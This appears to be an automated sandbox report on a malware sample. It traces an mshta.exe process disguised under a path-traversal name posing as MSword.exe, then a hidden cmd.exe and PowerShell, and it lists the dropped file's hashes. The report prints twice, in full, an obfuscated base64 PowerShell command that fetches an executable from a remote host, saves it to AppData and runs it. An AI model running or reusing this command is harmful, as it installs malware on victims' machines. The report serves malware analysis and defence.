| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DOCUMENT_COMPATIBLE_MODE |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_DOCUMENT_ZOOM |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_DOCUMENT_ZOOM |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_XSSFILTER |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_XSSFILTER |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615 |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615 |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ACTIVEX_INACTIVATE_MODE_REMOVAL_REVERT |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ACTIVEX_INACTIVATE_MODE_REMOVAL_REVERT |
|
1 | ||
| Read Value | HKEY_CLASSES_ROOT\clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32 | value_name = 0, data = C:\Windows\SysWOW64\mshtml.dll, type = REG_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | value_name = NoFileMenu, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup | value_name = Print_Background |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 | value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cmd.exe | show_window = SW_HIDE |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | C:\Windows\SysWOW64\mshtml.dll | base_address = 0x6f6a0000 |
|
1 | |
| Load | comctl32.dll | base_address = 0x74820000 |
|
1 | |
| Load | OLEAUT32.dll | base_address = 0x76910000 |
|
1 | |
| Load | mshtml.dll | base_address = 0x6f6a0000 |
|
1 | |
| Load | OLEACC.DLL | base_address = 0x74f50000 |
|
1 | |
| Load | ieframe.dll | base_address = 0x6ec20000 |
|
2 | |
| Load | oleaut32.dll | base_address = 0x76910000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x763f0000 |
|
1 | |
| Load | ole32.dll | base_address = 0x76d30000 |
|
1 | |
| Load | shell32.dll | base_address = 0x75650000 |
|
1 | |
| Get Handle | c:\windows\syswow64\mshta.exe | base_address = 0xdf0000 |
|
2 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x76520000 |
|
5 | |
| Get Handle | c:\windows\syswow64\kernelbase.dll | base_address = 0x772c0000 |
|
26 | |
| Get Handle | c:\windows\syswow64\advapi32.dll | base_address = 0x763f0000 |
|
1 | |
| Get Handle | EXPLORER.EXE | base_address = 0x0 |
|
1 | |
| Get Handle | IEXPLORE.EXE | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\syswow64\ole32.dll | base_address = 0x76d30000 |
|
1 | |
| Get Filename | process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Programs\Microsoft\Office\MSword.exe\..\..\..\..\windows\system32\mshta.exe, size = 260 |
|
4 | ||
| Get Filename | C:\Windows\SysWOW64\mshtml.dll | process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\SysWOW64\mshtml.dll, size = 260 |
|
1 | |
| Get Filename | c:\windows\syswow64\mshta.exe | process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Programs\Microsoft\Office\MSword.exe\..\..\..\..\windows\system32\mshta.exe, size = 260 |
|
1 | |
| Get Filename | IEXPLORE.EXE | process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Programs\Microsoft\Office\MSword.exe\..\..\..\..\windows\system32\mshta.exe, size = 260 |
|
1 | |
| Get Filename | IEXPLORE.EXE | process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Programs\Microsoft\Office\MSword.exe\..\..\..\..\windows\system32\mshta.exe, size = 261 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x76534f2b |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x76531252 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x76534208 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7653359f |
|
1 | |
| Get Address | c:\windows\syswow64\kernelbase.dll | function = EncodePointer, address_out = 0x778e0fcb |
|
9 | |
| Get Address | c:\windows\syswow64\kernelbase.dll | function = DecodePointer, address_out = 0x778d9d35 |
|
17 | |
| Get Address | c:\windows\syswow64\kernelbase.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x772d004f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSetInformation, address_out = 0x76535651 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = EventWrite, address_out = 0x77900c59 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = EventRegister, address_out = 0x778df6ba |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = EventUnregister, address_out = 0x778f9241 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RegisterApplicationRestart, address_out = 0x7655b53c |
|
1 | |
| Get Address | c:\windows\syswow64\mshtml.dll | function = RunHTMLApplication, address_out = 0x6f6fe710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeSRWLock, address_out = 0x778d8456 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = AcquireSRWLockExclusive, address_out = 0x778d29f1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = AcquireSRWLockShared, address_out = 0x778d2560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReleaseSRWLockExclusive, address_out = 0x778d29ab |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReleaseSRWLockShared, address_out = 0x778d25a9 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = 6, address_out = 0x76913e59 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = 7, address_out = 0x76914680 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = 8, address_out = 0x76913ed5 |
|
1 | |
| Get Address | c:\windows\syswow64\oleacc.dll | function = LresultFromObject, address_out = 0x74f52663 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = 2, address_out = 0x76914642 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VariantClear, address_out = 0x76913eae |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegisterTraceGuidsA, address_out = 0x7790848f |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExA, address_out = 0x76404907 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExA, address_out = 0x764048ef |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x7640469d |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoGetObjectContext, address_out = 0x76d7632b |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoCreateInstance, address_out = 0x76d79d0b |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = 26, address_out = 0x7692e9b7 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = 17, address_out = 0x7692e1b6 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = 25, address_out = 0x7692ea56 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoGetClassObject, address_out = 0x76d654ad |
|
1 | |
| Get Address | c:\windows\syswow64\shell32.dll | function = ShellExecuteExW, address_out = 0x75671e46 |
|
1 | |
| Create Mapping | filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 16 |
|
1 | ||
| Map | process_name = c:\windows\system32\mshta.exe, desired_access = FILE_MAP_WRITE |
|
1 |
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | class_name = HTML Application Host Window Class, wndproc_parameter = 1874695808 |
|
1 | ||
| Create | class_name = HTML Application Host Window Class, wndproc_parameter = 1874695808 |
|
1 | ||
| Set Attribute | class_name = HTML Application Host Window Class, index = 18446744073709551600, new_long = 18446744071609188352 |
|
2 | ||
| Set Attribute | class_name = HTML Application Host Window Class, index = 18446744073709551596, new_long = 262144 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = KB_LOCALE_ID |
|
1 | |
| Get Info | type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721 |
|
2 | |
| Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
19 | |
| Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
19 | |
| Read | virtual_key_code = VK_MENU, result_out = 0 |
|
12 | |
| Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
9 | |
| Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
9 | |
| Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
6 | |
| Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
5 | |
| Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
7 | |
| Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
7 | |
| Read | virtual_key_code = VK_LBUTTON, result_out = 1 |
|
2 | |
| Read | virtual_key_code = VK_MENU, result_out = 18446744073709551489 |
|
3 | |
| Read | virtual_key_code = VK_LMENU, result_out = 18446744073709551489 |
|
1 | |
| Read | virtual_key_code = VK_MENU, result_out = 1 |
|
3 | |
| Read | virtual_key_code = VK_LMENU, result_out = 1 |
|
2 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Cursor | x_out = 667, y_out = 493 |
|
1 | |
| Get Cursor | x_out = 793, y_out = 284 |
|
5 | |
| Get Cursor | x_out = 801, y_out = 498 |
|
3 | |
| Sleep | duration = 100 milliseconds (0.100 seconds) |
|
5 | |
| Get Time | type = System Time, time = 2017-10-16 14:26:51 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 66144 |
|
1 | |
| Get Time | type = Ticks, time = 79030 |
|
1 | |
| Get Time | type = Ticks, time = 79045 |
|
2 | |
| Get Time | type = Ticks, time = 79061 |
|
7 | |
| Get Time | type = Ticks, time = 79076 |
|
1 | |
| Get Time | type = Ticks, time = 79139 |
|
2 | |
| Get Time | type = Ticks, time = 79201 |
|
1 | |
| Get Time | type = Ticks, time = 79310 |
|
1 | |
| Get Time | type = Ticks, time = 79420 |
|
1 | |
| Get Info | type = Operating System |
|
7 | |
| Get Info | type = Operating System |
|
6 | |
| Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 | |
| Get Info |
|
3 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = Local\!PrivacIE!SharedMemory!Mutex |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String |
|
1 | ||
| Get Environment String | name = JS_PROFILER |
|
1 |
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Read | Win.ini | section_name = windows, key_name = DragDelay, default_value = 20, data_out = 20 |
|
1 | |
| Read | Win.ini | section_name = windows, key_name = DragScrollInset, default_value = 11, data_out = 11 |
|
1 | |
| Read | Win.ini | section_name = windows, key_name = DragScrollDelay, default_value = 50, data_out = 50 |
|
1 | |
| Read | Win.ini | section_name = windows, key_name = DragDelay, default_value = 200, data_out = 200 |
|
1 | |
| Read | Win.ini | section_name = windows, key_name = DragScrollInterval, default_value = 50, data_out = 50 |
|
1 |
| Information | Value |
|---|---|
| ID | #4 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\system32\cmd.exe" "/c powershell.exe -ExeCUtIonPolIcY bypass -WINdowSTYLE hiddEn -ENCodedcOMMANd UABvAHcAZQByAFMAaABlAGwAbAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAcgBvAGYAaQBsAGUAIAAtAHcAaQBuAGQAbwB3AHMAdAB5AGwAZQAgAG0AaQBuAGkAbQBpAHoAZQBkACAALQBjAG8AbQBtAGEAbgBkACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwB3AC0AcwB6AGMAegBlAGMAaQBuAC4AcABsAC8AaQBtAGcAMgAvAHMANQAwAC4AZQB4AGUAJwAsAB0gJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABuAHYAcwBzAC4AZQB4AGUAHSApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACgAHSAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAG4AdgBzAHMALgBlAHgAZQAdICkA " |
| Initial Working Directory | C:\Users\kFT6uTQW\Desktop\ |
| Monitor | Start Time: 00:00:45, Reason: Child Process |
| Unmonitor | End Time: 00:02:35, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:50 |
| Information | Value |
|---|---|
| PID | 0xa28 |
| Parent PID | 0x9c0 (c:\windows\system32\mshta.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A2C
|
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\kFT6uTQW\Desktop | type = file_attributes |
|
2 | |
| Get Info | powershell.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE |
|
5 | ||
| Open | STD_INPUT_HANDLE |
|
3 |
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor |
|
1 | ||
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | os_pid = 0xa40, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x4a8b0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x76520000 |
|
2 | |
| Get Filename | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | ||
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x7654a84f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x76553b92 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76534a5d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x7654a79d |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2017-10-16 14:27:04 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 79591 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String |
|
7 | ||
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\kFT6uTQW\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD, value = 0 |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii, value = 0 |
|
1 |
| Information | Value |
|---|---|
| ID | #5 |
| File Name | c:\windows\syswow64\windowspowershell\v1.0\powershell.exe |
| Command Line | powershell.exe -ExeCUtIonPolIcY bypass -WINdowSTYLE hiddEn -ENCodedcOMMANd UABvAHcAZQByAFMAaABlAGwAbAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAcgBvAGYAaQBsAGUAIAAtAHcAaQBuAGQAbwB3AHMAdAB5AGwAZQAgAG0AaQBuAGkAbQBpAHoAZQBkACAALQBjAG8AbQBtAGEAbgBkACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwB3AC0AcwB6AGMAegBlAGMAaQBuAC4AcABsAC8AaQBtAGcAMgAvAHMANQAwAC4AZQB4AGUAJwAsAB0gJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABuAHYAcwBzAC4AZQB4AGUAHSApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACgAHSAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAG4AdgBzAHMALgBlAHgAZQAdICkA " |
| Initial Working Directory | C:\Users\kFT6uTQW\Desktop\ |
| Monitor | Start Time: 00:00:46, Reason: Child Process |
| Unmonitor | End Time: 00:02:35, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:49 |
| Information | Value |
|---|---|
| PID | 0xa40 |
| Parent PID | 0xa28 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A44
0x
A48
0x
A4C
0x
A50
0x
A54
0x
A58
0x
0
0x
A5C
0x
A60
0x
A64
0x
A68
0x
A8C
0x
A98
|
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\kft6utqw\appdata\roaming\nvss.exe | 393.50 KB (402944 bytes) |
MD5:
36040c85f7aa54e66fd6ed5e7bf298dd
SHA1: 55b6e9b15003770842395be3e0d55ac477537ddd SHA256: aac8a8f087e8acfa9acd6e40ca4ee5b5c42f82e4e4f4633268b0bb91cf76de1d |
|
|
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\AppData\Roaming\nvss.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Get Info | C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.config | type = file_attributes |
|
3 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0 | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_attributes |
|
2 | |
